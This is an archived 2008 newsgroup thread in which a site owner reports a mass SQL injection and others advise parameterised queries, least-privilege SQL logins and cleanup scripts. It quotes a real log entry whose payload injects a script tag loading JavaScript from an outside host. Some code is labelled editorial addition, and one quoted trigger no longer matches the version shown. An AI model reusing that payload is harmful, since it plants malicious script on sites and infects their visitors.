SQL Injection

shank - 16 Jun 2008 23:27 GMT
- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
GET /sresult.asp
title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src=http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

My table was evidently hit with SQL Injection. I searched the IIS logs and
found hundreds of the below instances. Questions...

1) The end result was my image columns were updated to reflect:
Original data: files/icons/ps987_75.jpg
Updated data: files/icons/ps987_75.jpg<script
src=http://www.advabnr.com/b.js></script>
Thousands of records were updated like the above.
I tried downloading http://www.advabnr.com/b.js to see what's inside, but it
wasn't available.
What could have been in the js file to cause such an update?

2) I don't see how they could have known the Table name or the column names.
Same question as #1 I guess.

3) I was and still am using a stored procedure on that page to SELECT from
the table. How do I stop similar malicious efforts from happening again?

thanks
Bob Barrows [MVP] - 17 Jun 2008 00:37 GMT
> - - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
> GET /sresult.asp
[quoted text clipped - 13 lines]
> but it wasn't available.
> What could have been in the js file to cause such an update?

http://mvp.unixwiz.net/techtips/sql-injection.html
http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
http://www.nextgenss.com/papers/advanced_sql_injection.pdf
http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf

> 2) I don't see how they could have known the Table name or the column
> names. Same question as #1 I guess.

Same answer - by causing error messages that poor coding practice allows to
be returned to the user.

> 3) I was and still am using a stored procedure on that page to SELECT
> from the table. How do I stop similar malicious efforts from happening
> again?

Use parameters:
http://groups.google.com/group/microsoft.public.scripting.vbscript/msg/61fedf4e1efd63a6


Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"

Old Pedant - 17 Jun 2008 02:21 GMT
> > 2) I don't see how they could have known the Table name or the column
> > names. Same question as #1 I guess.
>
> Same answer - by causing error messages that poor coding practice allows to
> be returned to the user.

No, not really.  Oh, it's poor coding practice, but the original injection
(not seen here) is code that goes and reads the system tables and tries to
discover all user table names and all user VARCHAR, NVARCHAR, TEXT, NTEXT
field names and *THEN* injects the JavaScript into all those fields.

It's pretty sophisticated, actually.  But it's easily protected against by
simply disallowing access to the system tables from the IUSR_xxx and IWAM_xxx
accounts.  (Well, and of course by practicing good programming of the ASP
page in the first place.  But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)

If you care, I think I can find a copy of the actual injection attack code
still lurking, showing how it loops on all the tables and fields.
Bob Barrows [MVP] - 17 Jun 2008 11:53 GMT
>>> 2) I don't see how they could have known the Table name or the
>>> column names. Same question as #1 I guess.
[quoted text clipped - 7 lines]
> VARCHAR, NVARCHAR, TEXT, NTEXT field names and *THEN* injects the
> JavaScript into all those fields.

Yes, that's the other way, and it is covered in the links I provided, which
is what I meant by "same answer".

> It's pretty sophisticated, actually.  But it's easily protected
> against by simply disallowing access to the system tables from the
> IUSR_xxx and IWAM_xxx accounts.

... or whatever account is being used to connect to sql server.

> (Well, and of course by practicing
> good programming of the ASP page in the first place.  But even with
[quoted text clipped - 3 lines]
> If you care, I think I can find a copy of the actual injection attack
> code still lurking, showing how it loops on all the tables and fields.

I've seen it - I just hadn't put the two cases together.

Adam - 24 Jun 2008 15:28 GMT
"It's pretty sophisticated, actually.  But it's easily protected against by
simply disallowing access to the system tables from the IUSR_xxx and IWAM_xxx
accounts.  (Well, and of course by practicing good programming of the ASP
page in the first place.  But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)"

I apologize in advance if this is a stupid question, but in SQL Server 2005,
how do you deny access for the IUSR and IWAM accounts?

Thanks,
Adam

> > > 2) I don't see how they could have known the Table name or the column
> > > names. Same question as #1 I guess.
[quoted text clipped - 15 lines]
> If you care, I think I can find a copy of the actual injection attack code
> still lurking, showing how it loops on all the tables and fields.
Dave Anderson - 24 Jun 2008 15:41 GMT
> I apologize in advance if this is a stupid question, but in
> SQL Server 2005, how do you deny access for the IUSR and
> IWAM accounts?

The same way you do any other accounts. But most of us do not use trusted
connections for our web apps, meaning that the login used in your connection
string should have restricted rights.

In our case, we almost always give that login NO RIGHTS, then grant EXECUTE
permissions on a procedure-by-procedure basis.

Dave Anderson

Unsolicited commercial email will be read at a cost of $500 per message. Use
of this email address implies consent to these terms.
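
Dave's recipe above (a login with no rights plus EXECUTE on individual procedures) is also what makes the attack Old Pedant described fail, because a SQL Server 2005 user only sees catalog metadata for objects it has some permission on. The following T-SQL is an added example for this thread, not code from any poster; the database MusicDB, login web_app, table dbo.Songs and procedure dbo.usp_SearchSongs are assumed names.

```sql
-- Least-privilege login for the web app (assumed names: MusicDB, web_app,
-- dbo.Songs, dbo.usp_SearchSongs). Use this login in the connection string
-- instead of a trusted connection running as IUSR_xxx/IWAM_xxx.
USE MusicDB;
CREATE LOGIN web_app
    WITH PASSWORD = N'<replace-with-a-strong-password>', CHECK_POLICY = ON;
CREATE USER web_app FOR LOGIN web_app;   -- member of public only: no db_datareader, no db_owner
GRANT EXECUTE ON OBJECT::dbo.usp_SearchSongs TO web_app;   -- the only right it gets

-- Verify from inside the account. Metadata visibility in SQL Server 2005 is
-- limited to securables the user has permission on, so the catalog walk the
-- injection relies on (all tables, all char columns) comes back empty.
EXECUTE AS USER = 'web_app';
SELECT name FROM sys.tables;                                          -- no rows
SELECT name FROM sys.columns WHERE object_id = OBJECT_ID('dbo.Songs');  -- no rows
-- The procedure still works: dbo owns both the procedure and the table, so the
-- ownership chain lets it read dbo.Songs without web_app holding SELECT.
EXEC dbo.usp_SearchSongs @title = N'Higher And Higher';
-- SELECT * FROM dbo.Songs;   -- would fail: SELECT permission denied
REVERT;
```

If a procedure builds its query with EXEC or sp_executesql, the ownership chain is broken and the dynamic statement runs with web_app's own (empty) rights, which is the safe way for it to fail.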

Old Pedant - 17 Jun 2008 02:33 GMT
Here's an example of how it was originally injected into at least one web
site and thus database:

http://www.aspmessageboard.com/forum/showMessage.asp?F=21&M=894997&P=1#894984

The next post is my decoding of that and then Xander's post has a link to
here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.
Mike Brind [MVP] - 17 Jun 2008 08:06 GMT
> Here's an example of how it was originally injected into at least one web
> site and thus database:
[quoted text clipped - 5 lines]
> http://isc.sans.org/diary.html?n&storyid=4294
> that explains the whole process even more.

The interesting thing is that ww.aspfaq.com, which is mentioned in the
thread you linked to appears to have been a victim of something similar.
Google results warn that aspfaq may harm your computer....

--
Mike Brind
Microsoft MVP - ASP/ASP.NET
Mike Brind [MVP] - 17 Jun 2008 08:24 GMT
>> Here's an example of how it was originally injected into at least one web
>> site and thus database:
[quoted text clipped - 9 lines]
> thread you linked to appears to have been a victim of something similar.
> Google results warn that aspfaq may harm your computer....

Ah.  Not the one mentioned in the thread (which is plural).... but the one
that is frequently linked to from here.
Bob Barrows [MVP] - 17 Jun 2008 13:49 GMT
>>> Here's an example of how it was originally injected into at least
>>> one web site and thus database:

http://www.aspmessageboard.com/forum/showMessage.asp?F=21&M=894997&P=1#894984

>>> The next post is my decoding of that and then Xander's post has a
>>> link to here:
[quoted text clipped - 7 lines]
> Ah.  Not the one mentioned in the thread (which is plural).... but
> the one that is frequently linked to from here.

Oh my! That is embarrassing! I know Aaron used to recommend the use of
dynamic sql to execute stored procedures ... I'm sure he followed what
he preached, but I would have thought he knew to use a
limited-privileges account to connect to SQL. I'm going to give him the
benefit of the doubt and place the blame on the company that bought the
aspfaq site from him.

Microsoft MVP -- ASP/ASP.NET
Please reply to the newsgroup. The email account listed in my From
header is my spam trap, so I don't check it very often. You will get a
quicker response by posting to the newsgroup.

Bob Barrows [MVP] - 23 Jun 2008 19:22 GMT
>>> Here's an example of how it was originally injected into at least
>>> one web site and thus database:
[quoted text clipped - 9 lines]
>> the thread you linked to appears to have been a victim of something
>> similar. Google results warn that aspfaq may harm your computer....

They seem to have cleared that up. No more Google warnings there.

Mike Brind [MVP] - 23 Jun 2008 20:39 GMT
>>>> Here's an example of how it was originally injected into at least
>>>> one web site and thus database:
[quoted text clipped - 11 lines]
>
> They seem to have cleared that up. No more Google warnings there.

That is indeed a relief.

Mike
hammad siddiqui - 02 Jul 2008 10:11 GMT
I have the solution to this problem...

I work at a news channel. Recently we launched our news website and it was
attacked DAILY by this script. As a result, we used to restore the previous
database backup to avoid this problem. But after research, I have
written a script for every table affected. Now the website is
working smoothly.

I can provide this solution to you as well, but I will charge money for
it. To contact me, my e-mail address is hammad_siddiqui@yahoo.com.
Bob Barrows [MVP] - 02 Jul 2008 11:55 GMT
> I have the solution to this problem...
>
[quoted text clipped - 6 lines]
> I can provide this solution to you as well, but i will charge money
> for it. For contact my e-mail address is hammad_siddiqui@yahoo.com.

LOLOLOLOLOL
ROFL

There are freely available scripts in several places. I hope nobody finances
this leech.

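
The "freely available scripts" Bob refers to are variations of one remediation loop: walk every character column in the database and strip the injected tag. The script below is an added example written for this thread, not one posted by any participant; it assumes SQL Server 2005 or later and uses the exact tag quoted in the first post.

```sql
-- Remove the injected tag from every (n)char/(n)varchar column of the current
-- database. Dry run by default: per-column counts are printed, then rolled back.
-- Assumes SQL Server 2005+, a fresh backup, and rights to update every table.
SET NOCOUNT ON;
DECLARE @tag nvarchar(200);
SET @tag = N'<script src=http://www.advabnr.com/b.js></script>';   -- tag from the first post

DECLARE @schema sysname, @table sysname, @column sysname,
        @sql nvarchar(max), @n int, @total int;
SET @total = 0;

DECLARE col_cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS AS c
    JOIN INFORMATION_SCHEMA.TABLES AS t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'nchar', 'varchar', 'nvarchar');
      -- text/ntext columns need CAST(col AS nvarchar(max)) before REPLACE; not covered here

BEGIN TRAN;
OPEN col_cur;
FETCH NEXT FROM col_cur INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Identifiers go through QUOTENAME and the search string is passed as a
    -- parameter, so this cleanup cannot itself be injected into.
    SET @sql = N'UPDATE ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' SET ' + QUOTENAME(@column) + N' = REPLACE(' + QUOTENAME(@column) + N', @tag, N'''')'
             + N' WHERE CHARINDEX(@tag, ' + QUOTENAME(@column) + N') > 0;'
             + N' SET @n = @@ROWCOUNT;';
    EXEC sp_executesql @sql, N'@tag nvarchar(200), @n int OUTPUT', @tag = @tag, @n = @n OUTPUT;
    IF @n > 0
    BEGIN
        PRINT QUOTENAME(@schema) + N'.' + QUOTENAME(@table) + N'.' + QUOTENAME(@column)
              + N': ' + CAST(@n AS nvarchar(10)) + N' rows cleaned';
        SET @total = @total + @n;
    END
    FETCH NEXT FROM col_cur INTO @schema, @table, @column;
END
CLOSE col_cur;
DEALLOCATE col_cur;
PRINT N'Total rows: ' + CAST(@total AS nvarchar(10));
ROLLBACK TRAN;   -- change to COMMIT TRAN once the counts above are what you expect
```

Restoring a backup taken before the attack is still the cleaner fix; this loop is for the case where no such backup exists, and the rows it touches should be compared against the IIS log dates before committing.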
Mike Brind [MVP] - 02 Jul 2008 19:38 GMT
> I have the solution to this problem...
>
[quoted text clipped - 6 lines]
> I can provide this solution to you as well, but i will charge money for
> it. For contact my e-mail address is rip_off_merchant@yahoo.com.

If I launched a web site that was attacked like this, I would expect to be
fired or sued - not charge people money for fixing my mistakes.

subrata roy - 05 Jul 2008 09:51 GMT
It is one type of virus. Use a trigger and check the inserted data. Use this
code:

CREATE TRIGGER [Check_Code]
ON [EPI_TenderDetails]
AFTER INSERT, UPDATE
AS
BEGIN
-- SET NOCOUNT ON added to prevent extra result sets from
-- interfering with SELECT statements.
SET NOCOUNT ON;

-- Check every row in the inserted pseudo-table, not just one: the original
-- copied a single TenderNo into a variable, so a multi-row UPDATE (which is
-- exactly what the injection does) was only partly checked.
IF EXISTS (SELECT * FROM inserted
           WHERE TenderNo LIKE '%<script%' OR TenderNo LIKE '%script>%')
BEGIN
    RAISERROR ('Script tag rejected in TenderNo', 16, 1);
    ROLLBACK TRANSACTION;
END
END
Dave Anderson - 05 Jul 2008 17:19 GMT
> ...if exists (select * from inserted)
> select @Bus=TenderNo from inserted
> if @bus like '%<script%' or @bus like '%script>%'
> rollback
> -- Insert statements for trigger here ...

This does not address the core problem. Reaching your trigger implies that
injection has occurred. There is no guarantee that the next attack will use
SCRIPT tags.

For that matter, this nonsense forbids potential legitimate cases for
inserting SCRIPT tags. Imagine if a SQL injection forum kept rejecting your
post because you described the thing it was "protecting itself" against.

Bah.
